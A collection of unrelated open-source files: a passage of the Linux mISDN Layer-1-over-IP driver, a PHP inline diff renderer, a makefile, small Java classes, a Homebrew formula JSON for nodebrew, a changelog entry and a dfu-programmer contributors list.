printk(KERN_DEBUG "%s: socket thread terminated\n", __func__); return ret; } static void l1oip_socket_close(struct l1oip *hc) { struct dchannel *dch = hc->chan[hc->d_idx].dch; /* kill thread */ if (hc->socket_thread) { if (debug & DEBUG_L1OIP_SOCKET) printk(KERN_DEBUG "%s: socket thread exists, " "killing...\n", __func__); send_sig(SIGTERM, hc->socket_thread, 0); wait_for_completion(&hc->socket_complete); } /* if active, we send up a PH_DEACTIVATE and deactivate */ if (test_bit(FLG_ACTIVE, &dch->Flags)) { if (debug & (DEBUG_L1OIP_MSG | DEBUG_L1OIP_SOCKET)) printk(KERN_DEBUG "%s: interface become deactivated " "due to timeout\n", __func__); test_and_clear_bit(FLG_ACTIVE, &dch->Flags); _queue_data(&dch->dev.D, PH_DEACTIVATE_IND, MISDN_ID_ANY, 0, NULL, GFP_ATOMIC); } } static int l1oip_socket_open(struct l1oip *hc) { /* in case of reopen, we need to close first */ l1oip_socket_close(hc); init_completion(&hc->socket_complete); /* create receive process */ hc->socket_thread = kthread_run(l1oip_socket_thread, hc, "l1oip_%s", hc->name); if (IS_ERR(hc->socket_thread)) { int err = PTR_ERR(hc->socket_thread); printk(KERN_ERR "%s: Failed (%d) to create socket process.\n", __func__, err); hc->socket_thread = NULL; sock_release(hc->socket); return err; } if (debug & DEBUG_L1OIP_SOCKET) printk(KERN_DEBUG "%s: socket thread created\n", __func__); return 0; } static void l1oip_send_bh(struct work_struct *work) { struct l1oip *hc = container_of(work, struct l1oip, workq); if (debug & (DEBUG_L1OIP_MSG | DEBUG_L1OIP_SOCKET)) printk(KERN_DEBUG "%s: keepalive timer expired, sending empty " "frame on dchannel\n", __func__); /* send an empty l1oip frame at D-channel */ l1oip_socket_send(hc, 0, hc->d_idx, 0, 0, NULL, 0); } /* * timer stuff */ static void l1oip_keepalive(struct timer_list *t) { struct l1oip *hc = from_timer(hc, t, keep_tl); schedule_work(&hc->workq); } static void l1oip_timeout(struct timer_list *t) { struct l1oip *hc = from_timer(hc, t, timeout_tl); struct dchannel *dch = hc->chan[hc->d_idx].dch; if (debug & DEBUG_L1OIP_MSG) printk(KERN_DEBUG "%s: timeout timer expired, turn layer one " "down.\n", __func__); hc->timeout_on = 0; /* state that timer must be initialized next time */ /* if 
timeout, we send up a PH_DEACTIVATE and deactivate */ if (test_bit(FLG_ACTIVE, &dch->Flags)) { if (debug & (DEBUG_L1OIP_MSG | DEBUG_L1OIP_SOCKET)) printk(KERN_DEBUG "%s: interface become deactivated " "due to timeout\n", __func__); test_and_clear_bit(FLG_ACTIVE, &dch->Flags); _queue_data(&dch->dev.D, PH_DEACTIVATE_IND, MISDN_ID_ANY, 0, NULL, GFP_ATOMIC); } /* if we have ondemand set, we remove ip address */ if (hc->ondemand) { if (debug & DEBUG_L1OIP_MSG) printk(KERN_DEBUG "%s: on demand causes ip address to " "be removed\n", __func__); hc->sin_remote.sin_addr.s_addr = 0; } } /* * message handling */ static int handle_dmsg(struct mISDNchannel *ch, struct sk_buff *skb) { struct mISDNdevice *dev = container_of(ch, struct mISDNdevice, D); struct dchannel *dch = container_of(dev, struct dchannel, dev); struct l1oip *hc = dch->hw; struct mISDNhead *hh = mISDN_HEAD_P(skb); int ret = -EINVAL; int l, ll; unsigned char *p; switch (hh->prim) { case PH_DATA_REQ: if (skb->len < 1) { printk(KERN_WARNING "%s: skb too small\n", __func__); break; } if (skb->len > MAX_DFRAME_LEN_L1 || skb->len > L1OIP_MAX_LEN) { printk(KERN_WARNING "%s: skb too large\n", __func__); break; } /* send frame */ p = skb->data; l = skb->len; while (l) { /* * This is technically bounded by L1OIP_MAX_PERFRAME but * MAX_DFRAME_LEN_L1 < L1OIP_MAX_PERFRAME */ ll = (l < MAX_DFRAME_LEN_L1) ? l : MAX_DFRAME_LEN_L1; l1oip_socket_send(hc, 0, dch->slot, 0, hc->chan[dch->slot].tx_counter++, p, ll); p += ll; l -= ll; } skb_trim(skb, 0); queue_ch_frame(ch, PH_DATA_CNF, hh->id, skb); return 0; case PH_ACTIVATE_REQ: if (debug & (DEBUG_L1OIP_MSG | DEBUG_L1OIP_SOCKET)) printk(KERN_DEBUG "%s: PH_ACTIVATE channel %d (1..%d)\n" , __func__, dch->slot, hc->b_num + 1); skb_trim(skb, 0); if (test_bit(FLG_ACTIVE, &dch->Flags)) queue_ch_frame(ch, PH_ACTIVATE_IND, hh->id, skb); else queue_ch_frame(ch, PH_DEACTIVATE_IND, hh->id, skb); return 0; case PH_DEACTIVATE_REQ: if (debug & (DEBUG_L1OIP_MSG | DEBUG_L1OIP_SOCKET)) printk(KERN_DEBUG "%s: PH_DEACTIVATE channel %d " "(1..%d)\n", __func__, dch->slot, hc->b_num + 1); skb_trim(skb, 0); if (test_bit(FLG_ACTIVE, &dch->Flags)) queue_ch_frame(ch, PH_ACTIVATE_IND, hh->id, skb); else queue_ch_frame(ch, PH_DEACTIVATE_IND, hh->id, skb); return 0; } if (!ret) dev_kfree_skb(skb); return ret; } static int channel_dctrl(struct dchannel *dch, struct mISDN_ctrl_req *cq) { int ret = 0; struct l1oip *hc = dch->hw; switch (cq->op) { case MISDN_CTRL_GETOP: cq->op = MISDN_CTRL_SETPEER | MISDN_CTRL_UNSETPEER | MISDN_CTRL_GETPEER; break; case MISDN_CTRL_SETPEER: hc->remoteip = (u32)cq->p1; hc->remoteport = cq->p2 & 0xffff; hc->localport = cq->p2 >> 16; if (!hc->remoteport) hc->remoteport = hc->localport; if (debug & DEBUG_L1OIP_SOCKET) printk(KERN_DEBUG "%s: got new ip address from user " "space.\n", __func__); l1oip_socket_open(hc); break; case MISDN_CTRL_UNSETPEER: if (debug & DEBUG_L1OIP_SOCKET) printk(KERN_DEBUG "%s: removing ip address.\n", __func__); hc->remoteip = 0; l1oip_socket_open(hc); break; case MISDN_CTRL_GETPEER: if (debug & DEBUG_L1OIP_SOCKET) printk(KERN_DEBUG "%s: getting ip address.\n", __func__); cq->p1 = hc->remoteip; cq->p2 = hc->remoteport | (hc->localport << 16); break; default: printk(KERN_WARNING "%s: unknown Op %x\n", __func__, cq->op); ret = -EINVAL; break; } return ret; } static int open_dchannel(struct l1oip *hc, struct dchannel *dch, struct channel_req *rq) { if (debug & DEBUG_HW_OPEN) printk(KERN_DEBUG "%s: dev(%d) open from %p\n", __func__, dch->dev.id, __builtin_return_address(0)); if 
(rq->protocol == ISDN_P_NONE) return -EINVAL; if ((dch->dev.D.protocol != ISDN_P_NONE) && (dch->dev.D.protocol != rq->protocol)) { if (debug & DEBUG_HW_OPEN) printk(KERN_WARNING "%s: change protocol %x to %x\n", __func__, dch->dev.D.protocol, rq->protocol); } if (dch->dev.D.protocol != rq->protocol) dch->dev.D.protocol = rq->protocol; if (test_bit(FLG_ACTIVE, &dch->Flags)) { _queue_data(&dch->dev.D, PH_ACTIVATE_IND, MISDN_ID_ANY, 0, NULL, GFP_KERNEL); } rq->ch = &dch->dev.D; if (!try_module_get(THIS_MODULE)) printk(KERN_WARNING "%s:cannot get module\n", __func__); return 0; } static int open_bchannel(struct l1oip *hc, struct dchannel *dch, struct channel_req *rq) { struct bchannel *bch; int ch; if (!test_channelmap(rq->adr.channel, dch->dev.channelmap)) return -EINVAL; if (rq->protocol == ISDN_P_NONE) return -EINVAL; ch = rq->adr.channel; /* BRI: 1=B1 2=B2 PRI: 1..15,17.. */ bch = hc->chan[ch].bch; if (!bch) { printk(KERN_ERR "%s:internal error ch %d has no bch\n", __func__, ch); return -EINVAL; } if (test_and_set_bit(FLG_OPEN, &bch->Flags)) return -EBUSY; /* b-channel can be only open once */ bch->ch.protocol = rq->protocol; rq->ch = &bch->ch; if (!try_module_get(THIS_MODULE)) printk(KERN_WARNING "%s:cannot get module\n", __func__); return 0; } static int l1oip_dctrl(struct mISDNchannel *ch, u_int cmd, void *arg) { struct mISDNdevice *dev = container_of(ch, struct mISDNdevice, D); struct dchannel *dch = container_of(dev, struct dchannel, dev); struct l1oip *hc = dch->hw; struct channel_req *rq; int err = 0; if (dch->debug & DEBUG_HW) printk(KERN_DEBUG "%s: cmd:%x %p\n", __func__, cmd, arg); switch (cmd) { case OPEN_CHANNEL: rq = arg; switch (rq->protocol) { case ISDN_P_TE_S0: case ISDN_P_NT_S0: if (hc->pri) { err = -EINVAL; break; } err = open_dchannel(hc, dch, rq); break; case ISDN_P_TE_E1: case ISDN_P_NT_E1: if (!hc->pri) { err = -EINVAL; break; } err = open_dchannel(hc, dch, rq); break; default: err = open_bchannel(hc, dch, rq); } break; case CLOSE_CHANNEL: if (debug & DEBUG_HW_OPEN) printk(KERN_DEBUG "%s: dev(%d) close from %p\n", __func__, dch->dev.id, __builtin_return_address(0)); module_put(THIS_MODULE); break; case CONTROL_CHANNEL: err = channel_dctrl(dch, arg); break; default: if (dch->debug & DEBUG_HW) printk(KERN_DEBUG "%s: unknown command %x\n", __func__, cmd); err = -EINVAL; } return err; } static int handle_bmsg(struct mISDNchannel *ch, struct sk_buff *skb) { struct bchannel *bch = container_of(ch, struct bchannel, ch); struct l1oip *hc = bch->hw; int ret = -EINVAL; struct mISDNhead *hh = mISDN_HEAD_P(skb); int l, ll; unsigned char *p; switch (hh->prim) { case PH_DATA_REQ: if (skb->len <= 0) { printk(KERN_WARNING "%s: skb too small\n", __func__); break; } if (skb->len > MAX_DFRAME_LEN_L1 || skb->len > L1OIP_MAX_LEN) { printk(KERN_WARNING "%s: skb too large\n", __func__); break; } /* check for AIS / ulaw-silence */ l = skb->len; if (!memchr_inv(skb->data, 0xff, l)) { if (debug & DEBUG_L1OIP_MSG) printk(KERN_DEBUG "%s: got AIS, not sending, " "but counting\n", __func__); hc->chan[bch->slot].tx_counter += l; skb_trim(skb, 0); queue_ch_frame(ch, PH_DATA_CNF, hh->id, skb); return 0; } /* check for silence */ l = skb->len; if (!memchr_inv(skb->data, 0x2a, l)) { if (debug & DEBUG_L1OIP_MSG) printk(KERN_DEBUG "%s: got silence, not sending" ", but counting\n", __func__); hc->chan[bch->slot].tx_counter += l; skb_trim(skb, 0); queue_ch_frame(ch, PH_DATA_CNF, hh->id, skb); return 0; } /* send frame */ p = skb->data; l = skb->len; while (l) { /* * This is technically bounded by 
L1OIP_MAX_PERFRAME but * MAX_DFRAME_LEN_L1 < L1OIP_MAX_PERFRAME */ ll = (l < MAX_DFRAME_LEN_L1) ? l : MAX_DFRAME_LEN_L1; l1oip_socket_send(hc, hc->codec, bch->slot, 0, hc->chan[bch->slot].tx_counter, p, ll); hc->chan[bch->slot].tx_counter += ll; p += ll; l -= ll; } skb_trim(skb, 0); queue_ch_frame(ch, PH_DATA_CNF, hh->id, skb); return 0; case PH_ACTIVATE_REQ: if (debug & (DEBUG_L1OIP_MSG | DEBUG_L1OIP_SOCKET)) printk(KERN_DEBUG "%s: PH_ACTIVATE channel %d (1..%d)\n" , __func__, bch->slot, hc->b_num + 1); hc->chan[bch->slot].codecstate = 0; test_and_set_bit(FLG_ACTIVE, &bch->Flags); skb_trim(skb, 0); queue_ch_frame(ch, PH_ACTIVATE_IND, hh->id, skb); return 0; case PH_DEACTIVATE_REQ: if (debug & (DEBUG_L1OIP_MSG | DEBUG_L1OIP_SOCKET)) printk(KERN_DEBUG "%s: PH_DEACTIVATE channel %d " "(1..%d)\n", __func__, bch->slot, hc->b_num + 1); test_and_clear_bit(FLG_ACTIVE, &bch->Flags); skb_trim(skb, 0); queue_ch_frame(ch, PH_DEACTIVATE_IND, hh->id, skb); return 0; } if (!ret) dev_kfree_skb(skb); return ret; } static int channel_bctrl(struct bchannel *bch, struct mISDN_ctrl_req *cq) { int ret = 0; struct dsp_features *features = (struct dsp_features *)(*((u_long *)&cq->p1)); switch (cq->op) { case MISDN_CTRL_GETOP: cq->op = MISDN_CTRL_HW_FEATURES_OP; break; case MISDN_CTRL_HW_FEATURES: /* fill features structure */ if (debug & DEBUG_L1OIP_MSG) printk(KERN_DEBUG "%s: HW_FEATURE request\n", __func__); /* create confirm */ features->unclocked = 1; features->unordered = 1; break; default: printk(KERN_WARNING "%s: unknown Op %x\n", __func__, cq->op); ret = -EINVAL; break; } return ret; } static int l1oip_bctrl(struct mISDNchannel *ch, u_int cmd, void *arg) { struct bchannel *bch = container_of(ch, struct bchannel, ch); int err = -EINVAL; if (bch->debug & DEBUG_HW) printk(KERN_DEBUG "%s: cmd:%x %p\n", __func__, cmd, arg); switch (cmd) { case CLOSE_CHANNEL: test_and_clear_bit(FLG_OPEN, &bch->Flags); test_and_clear_bit(FLG_ACTIVE, &bch->Flags); ch->protocol = ISDN_P_NONE; ch->peer = NULL; module_put(THIS_MODULE); err = 0; break; case CONTROL_CHANNEL: err = channel_bctrl(bch, arg); break; default: printk(KERN_WARNING "%s: unknown prim(%x)\n", __func__, cmd); } return err; } /* * cleanup module and stack */ static void release_card(struct l1oip *hc) { int ch; if (timer_pending(&hc->keep_tl)) del_timer(&hc->keep_tl); if (timer_pending(&hc->timeout_tl)) del_timer(&hc->timeout_tl); cancel_work_sync(&hc->workq); if (hc->socket_thread) l1oip_socket_close(hc); if (hc->registered && hc->chan[hc->d_idx].dch) mISDN_unregister_device(&hc->chan[hc->d_idx].dch->dev); for (ch = 0; ch < 128; ch++) { if (hc->chan[ch].dch) { mISDN_freedchannel(hc->chan[ch].dch); kfree(hc->chan[ch].dch); } if (hc->chan[ch].bch) { mISDN_freebchannel(hc->chan[ch].bch); kfree(hc->chan[ch].bch); #ifdef REORDER_DEBUG if (hc->chan[ch].disorder_skb) dev_kfree_skb(hc->chan[ch].disorder_skb); #endif } } spin_lock(&l1oip_lock); list_del(&hc->list); spin_unlock(&l1oip_lock); kfree(hc); } static void l1oip_cleanup(void) { struct l1oip *hc, *next; list_for_each_entry_safe(hc, next, &l1oip_ilist, list) release_card(hc); l1oip_4bit_free(); } /* * module and stack init */ static int init_card(struct l1oip *hc, int pri, int bundle) { struct dchannel *dch; struct bchannel *bch; int ret; int i, ch; spin_lock_init(&hc->socket_lock); hc->idx = l1oip_cnt; hc->pri = pri; hc->d_idx = pri ? 16 : 3; hc->b_num = pri ? 
30 : 2; hc->bundle = bundle; if (hc->pri) sprintf(hc->name, "l1oip-e1.%d", l1oip_cnt + 1); else sprintf(hc->name, "l1oip-s0.%d", l1oip_cnt + 1); switch (codec[l1oip_cnt]) { case 0: /* as is */ case 1: /* alaw */ case 2: /* ulaw */ case 3: /* 4bit */ break; default: printk(KERN_ERR "Codec(%d) not supported.\n", codec[l1oip_cnt]); return -EINVAL; } hc->codec = codec[l1oip_cnt]; if (debug & DEBUG_L1OIP_INIT) printk(KERN_DEBUG "%s: using codec %d\n", __func__, hc->codec); if (id[l1oip_cnt] == 0) { printk(KERN_WARNING "Warning: No 'id' value given or " "0, this is highly unsecure. Please use 32 " "bit random number 0x...\n"); } hc->id = id[l1oip_cnt]; if (debug & DEBUG_L1OIP_INIT) printk(KERN_DEBUG "%s: using id 0x%x\n", __func__, hc->id); hc->ondemand = ondemand[l1oip_cnt]; if (hc->ondemand && !hc->id) { printk(KERN_ERR "%s: ondemand option only allowed in " "conjunction with non 0 ID\n", __func__); return -EINVAL; } if (limit[l1oip_cnt]) hc->b_num = limit[l1oip_cnt]; if (!pri && hc->b_num > 2) { printk(KERN_ERR "Maximum limit for BRI interface is 2 " "channels.\n"); return -EINVAL; } if (pri && hc->b_num > 126) { printk(KERN_ERR "Maximum limit for PRI interface is 126 " "channels.\n"); return -EINVAL; } if (pri && hc->b_num > 30) { printk(KERN_WARNING "Maximum limit for BRI interface is 30 " "channels.\n"); printk(KERN_WARNING "Your selection of %d channels must be " "supported by application.\n", hc->limit); } hc->remoteip = ip[l1oip_cnt << 2] << 24 | ip[(l1oip_cnt << 2) + 1] << 16 | ip[(l1oip_cnt << 2) + 2] << 8 | ip[(l1oip_cnt << 2) + 3]; hc->localport = port[l1oip_cnt]?:(L1OIP_DEFAULTPORT + l1oip_cnt); if (remoteport[l1oip_cnt]) hc->remoteport = remoteport[l1oip_cnt]; else hc->remoteport = hc->localport; if (debug & DEBUG_L1OIP_INIT) printk(KERN_DEBUG "%s: using local port %d remote ip " "%d.%d.%d.%d port %d ondemand %d\n", __func__, hc->localport, hc->remoteip >> 24, (hc->remoteip >> 16) & 0xff, (hc->remoteip >> 8) & 0xff, hc->remoteip & 0xff, hc->remoteport, hc->ondemand); dch = kzalloc(sizeof(struct dchannel), GFP_KERNEL); if (!dch) return -ENOMEM; dch->debug = debug; mISDN_initdchannel(dch, MAX_DFRAME_LEN_L1, NULL); dch->hw = hc; if (pri) dch->dev.Dprotocols = (1 << ISDN_P_TE_E1) | (1 << ISDN_P_NT_E1); else dch->dev.Dprotocols = (1 << ISDN_P_TE_S0) | (1 << ISDN_P_NT_S0); dch->dev.Bprotocols = (1 << (ISDN_P_B_RAW & ISDN_P_B_MASK)) | (1 << (ISDN_P_B_HDLC & ISDN_P_B_MASK)); dch->dev.D.send = handle_dmsg; dch->dev.D.ctrl = l1oip_dctrl; dch->dev.nrbchan = hc->b_num; dch->slot = hc->d_idx; hc->chan[hc->d_idx].dch = dch; i = 1; for (ch = 0; ch < dch->dev.nrbchan; ch++) { if (ch == 15) i++; bch = kzalloc(sizeof(struct bchannel), GFP_KERNEL); if (!bch) { printk(KERN_ERR "%s: no memory for bchannel\n", __func__); return -ENOMEM; } bch->nr = i + ch; bch->slot = i + ch; bch->debug = debug; mISDN_initbchannel(bch, MAX_DATA_MEM, 0); bch->hw = hc; bch->ch.send = handle_bmsg; bch->ch.ctrl = l1oip_bctrl; bch->ch.nr = i + ch; list_add(&bch->ch.list, &dch->dev.bchannels); hc->chan[i + ch].bch = bch; set_channelmap(bch->nr, dch->dev.channelmap); } /* TODO: create a parent device for this driver */ ret = mISDN_register_device(&dch->dev, NULL, hc->name); if (ret) return ret; hc->registered = 1; if (debug & DEBUG_L1OIP_INIT) printk(KERN_DEBUG "%s: Setting up network card(%d)\n", __func__, l1oip_cnt + 1); ret = l1oip_socket_open(hc); if (ret) return ret; timer_setup(&hc->keep_tl, l1oip_keepalive, 0); hc->keep_tl.expires = jiffies + 2 * HZ; /* two seconds first time */ add_timer(&hc->keep_tl); 
timer_setup(&hc->timeout_tl, l1oip_timeout, 0); hc->timeout_on = 0; /* state that we have timer off */ return 0; } static int __init l1oip_init(void) { int pri, bundle; struct l1oip *hc; int ret; printk(KERN_INFO "mISDN: Layer-1-over-IP driver Rev. %s\n", l1oip_revision); INIT_LIST_HEAD(&l1oip_ilist); spin_lock_init(&l1oip_lock); if (l1oip_4bit_alloc(ulaw)) return -ENOMEM; l1oip_cnt = 0; while (l1oip_cnt < MAX_CARDS && type[l1oip_cnt]) { switch (type[l1oip_cnt] & 0xff) { case 1: pri = 0; bundle = 0; break; case 2: pri = 1; bundle = 0; break; case 3: pri = 0; bundle = 1; break; case 4: pri = 1; bundle = 1; break; default: printk(KERN_ERR "Card type(%d) not supported.\n", type[l1oip_cnt] & 0xff); l1oip_cleanup(); return -EINVAL; } if (debug & DEBUG_L1OIP_INIT) printk(KERN_DEBUG "%s: interface %d is %s with %s.\n", __func__, l1oip_cnt, pri ? "PRI" : "BRI", bundle ? "bundled IP packet for all B-channels" : "separate IP packets for every B-channel"); hc = kzalloc(sizeof(struct l1oip), GFP_ATOMIC); if (!hc) { printk(KERN_ERR "No kmem for L1-over-IP driver.\n"); l1oip_cleanup(); return -ENOMEM; } INIT_WORK(&hc->workq, (void *)l1oip_send_bh); spin_lock(&l1oip_lock); list_add_tail(&hc->list, &l1oip_ilist); spin_unlock(&l1oip_lock); ret = init_card(hc, pri, bundle); if (ret) { l1oip_cleanup(); return ret; } l1oip_cnt++; } printk(KERN_INFO "%d virtual devices registered\n", l1oip_cnt); return 0; } module_init(l1oip_init); module_exit(l1oip_cleanup);
{ "pile_set_name": "Github" }
Title: janitza_umg_freq: fixed crash when no frequency measurements were reported by the device
Level: 1
Component: checks
Compatible: compat
Version: 1.2.7i3
Date: 1443103718
Class: fix
{ "pile_set_name": "Github" }
<?php /** * Inline HTML diff generator for PHP DiffLib. * * PHP version 5 * * Copyright (c) 2009 Chris Boulton <[email protected]> * * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions are met: * * - Redistributions of source code must retain the above copyright notice, * this list of conditions and the following disclaimer. * - Redistributions in binary form must reproduce the above copyright notice, * this list of conditions and the following disclaimer in the documentation * and/or other materials provided with the distribution. * - Neither the name of the Chris Boulton nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE * LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR * CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN * CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE * POSSIBILITY OF SUCH DAMAGE. * * @package DiffLib * @author Chris Boulton <[email protected]> * @copyright (c) 2009 Chris Boulton * @license New BSD License http://www.opensource.org/licenses/bsd-license.php * @version 1.1 * @link http://github.com/chrisboulton/php-diff */ require_once dirname(__FILE__).'/Array.php'; class Diff_Renderer_Html_Inline extends Diff_Renderer_Html_Array { /** * Render a and return diff with changes between the two sequences * displayed inline (under each other) * * @return string The generated inline diff. 
*/ public function render() { $changes = parent::render(); $html = ''; if(empty($changes)) { return $html; } $html .= '<table class="Differences DifferencesInline">'; $html .= '<thead>'; $html .= '<tr>'; $html .= '<th>Old</th>'; $html .= '<th>New</th>'; $html .= '<th>Differences</th>'; $html .= '</tr>'; $html .= '</thead>'; foreach($changes as $i => $blocks) { // If this is a separate block, we're condensing code so output ..., // indicating a significant portion of the code has been collapsed as // it is the same if($i > 0) { $html .= '<tbody class="Skipped">'; $html .= '<th>&hellip;</th>'; $html .= '<th>&hellip;</th>'; $html .= '<td>&nbsp;</td>'; $html .= '</tbody>'; } foreach($blocks as $change) { $html .= '<tbody class="Change'.ucfirst($change['tag']).'">'; // Equal changes should be shown on both sides of the diff if($change['tag'] == 'equal') { foreach($change['base']['lines'] as $no => $line) { $fromLine = $change['base']['offset'] + $no + 1; $toLine = $change['changed']['offset'] + $no + 1; $html .= '<tr>'; $html .= '<th>'.$fromLine.'</th>'; $html .= '<th>'.$toLine.'</th>'; $html .= '<td class="Left">'.$line.'</td>'; $html .= '</tr>'; } } // Added lines only on the right side else if($change['tag'] == 'insert') { foreach($change['changed']['lines'] as $no => $line) { $toLine = $change['changed']['offset'] + $no + 1; $html .= '<tr>'; $html .= '<th>&nbsp;</th>'; $html .= '<th>'.$toLine.'</th>'; $html .= '<td class="Right"><ins>'.$line.'</ins>&nbsp;</td>'; $html .= '</tr>'; } } // Show deleted lines only on the left side else if($change['tag'] == 'delete') { foreach($change['base']['lines'] as $no => $line) { $fromLine = $change['base']['offset'] + $no + 1; $html .= '<tr>'; $html .= '<th>'.$fromLine.'</th>'; $html .= '<th>&nbsp;</th>'; $html .= '<td class="Left"><del>'.$line.'</del>&nbsp;</td>'; $html .= '</tr>'; } } // Show modified lines on both sides else if($change['tag'] == 'replace') { foreach($change['base']['lines'] as $no => $line) { $fromLine = $change['base']['offset'] + $no + 1; $html .= '<tr>'; $html .= '<th>'.$fromLine.'</th>'; $html .= '<th>&nbsp;</th>'; $html .= '<td class="Left"><span>'.$line.'</span></td>'; $html .= '</tr>'; } foreach($change['changed']['lines'] as $no => $line) { $toLine = $change['changed']['offset'] + $no + 1; $html .= '<tr>'; $html .= '<th>'.$toLine.'</th>'; $html .= '<th>&nbsp;</th>'; $html .= '<td class="Right"><span>'.$line.'</span></td>'; $html .= '</tr>'; } } $html .= '</tbody>'; } } $html .= '</table>'; return $html; } }
{ "pile_set_name": "Github" }
#
# Copyright 2011-2020 Branimir Karadzic. All rights reserved.
# License: https://github.com/bkaradzic/bgfx#license-bsd-2-clause
#

BGFX_DIR=../..
RUNTIME_DIR=$(BGFX_DIR)/examples/runtime
BUILD_DIR=../../.build

include $(BGFX_DIR)/scripts/shader.mk
{ "pile_set_name": "Github" }
/*
 * Sonatype Nexus (TM) Open Source Version
 * Copyright (c) 2008-present Sonatype, Inc.
 * All rights reserved. Includes the third-party code listed at http://links.sonatype.com/products/nexus/oss/attributions.
 *
 * This program and the accompanying materials are made available under the terms of the Eclipse Public License Version 1.0,
 * which accompanies this distribution and is available at http://www.eclipse.org/legal/epl-v10.html.
 *
 * Sonatype Nexus (TM) Professional Version is available from Sonatype, Inc. "Sonatype" and "Sonatype Nexus" are trademarks
 * of Sonatype, Inc. Apache Maven is a trademark of the Apache Software Foundation. M2eclipse is a trademark of the
 * Eclipse Foundation. All other trademarks are the property of their respective owners.
 */
package org.sonatype.nexus.security.authz;

/**
 * Thrown when an {@link AuthorizationManager} could not be found.
 */
public class NoSuchAuthorizationManagerException
    extends Exception
{
  private static final long serialVersionUID = -9130834235862218360L;

  public NoSuchAuthorizationManagerException(final String source) {
    super("Authorization-manager with source '" + source + "' could not be found");
  }
}
{ "pile_set_name": "Github" }
{ "name": "nodebrew", "full_name": "nodebrew", "oldname": null, "aliases": [ ], "versioned_formulae": [ ], "desc": "Node.js version manager", "license": "MIT", "homepage": "https://github.com/hokaccha/nodebrew", "versions": { "stable": "1.0.1", "head": "HEAD", "bottle": false }, "urls": { "stable": { "url": "https://github.com/hokaccha/nodebrew/archive/v1.0.1.tar.gz", "tag": null, "revision": null } }, "revision": 0, "version_scheme": 0, "bottle": { }, "keg_only": false, "bottle_disabled": true, "options": [ ], "build_dependencies": [ ], "dependencies": [ ], "recommended_dependencies": [ ], "optional_dependencies": [ ], "uses_from_macos": [ ], "requirements": [ ], "conflicts_with": [ ], "caveats": "You need to manually run setup_dirs to create directories required by nodebrew:\n $(brew --prefix)/opt/nodebrew/bin/nodebrew setup_dirs\n\nAdd path:\n export PATH=$HOME/.nodebrew/current/bin:$PATH\n\nTo use Homebrew's directories rather than ~/.nodebrew add to your profile:\n export NODEBREW_ROOT=$(brew --prefix)/var/nodebrew\n", "installed": [ ], "linked_keg": null, "pinned": false, "outdated": false, "deprecated": false, "disabled": false }
{ "pile_set_name": "Github" }
/*
 * (C) Copyright 2015-2016 the original author or authors.
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *     http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 *
 * Contributors:
 *   [email protected] (夜色)
 */

package com.mpush.bootstrap;

import com.mpush.tools.log.Logs;

public class Main {

    /**
     * When launching from source, do not run this method directly,
     * otherwise the configuration files will not be loaded correctly.
     *
     * @param args launch arguments
     */
    public static void main(String[] args) {
        Logs.init();
        Logs.Console.info("launch mpush server...");
        ServerLauncher launcher = new ServerLauncher();
        launcher.init();
        launcher.start();
        addHook(launcher);
    }

    /**
     * Notes:
     * 1. Do not call System.exit() inside the shutdown-hook thread, otherwise it causes an endless loop.
     * 2. If there are non-daemon threads, the hook only runs once all non-daemon threads have finished.
     * 3. Threads are non-daemon by default, so be careful when creating them.
     * 4. Watch for exceptions thrown by threads; if uncaught, they all end up in Thread.dispatchUncaughtException.
     *
     * @param launcher
     */
    private static void addHook(ServerLauncher launcher) {
        Runtime.getRuntime().addShutdownHook(
            new Thread(() -> {
                try {
                    launcher.stop();
                } catch (Exception e) {
                    Logs.Console.error("mpush server stop ex", e);
                }
                Logs.Console.info("jvm exit, all service stopped.");
            }, "mpush-shutdown-hook-thread")
        );
    }
}
{ "pile_set_name": "Github" }
Original Author:
 - Weston Schmidt <[email protected]>

Contributors:
 - Reinhard Arlt
   - at89c5131 chip support
 - Anton Blad
   - at90usb162 and at90usb82 chip support
 - David Brownell
   - compiler flag improvements
   - command line argument processing improvements
   - debugging system improvements
   - significant man page improvements
   - support for the at90usb series AVR chips
   - the beginnings of the move over to using stdint.h
 - Nick Hibma
   - bug fixes
 - Markus Schneider
   - OS X porting issues
 - Geoffrey Wossum
   - added reset command
 - Sean D'Epagnier
   - eeprom bug fix
   - 4K bootloader support fix
 - Peter Gammie
   - at90usb647 PID fix
 - Zachary Clifford
   - completed AVR32 support
   - identified a number of off-by-one errors waiting to happen
   - identified that AVR32 "User Pages" aren't supported yet
   - patch to allow proper handling of the trampoline code
   - patch to allow flashing user flash space & STDIN
   - patch to enable support for windows using mingw32
   - patch to enable setting/getting fuses for the AVR32 devices
 - Donald Davis
   - patch with new AVR devices & testing of support for the devices
 - Brad Schick
   - identified that the flash memory overlaps the bootloader memory
   - identified the off-by-one issue when the bootloader is in upper memory
 - Xavier Leprevost
   - patch to fix an error in the avr32 user flash dump command
 - Dave Fletcher
   - patch to enable atmega32u2 chips
 - Torsten Rottmann
   - patch to enable libusb 1.0 support
 - Mitko
   - patch to enable at32uc3b1512 and at32uc3b0512 chips
 - Darren Gibbs
   - identified dead/bad code around the bootloader overlap checking
 - Holger Steinhaus
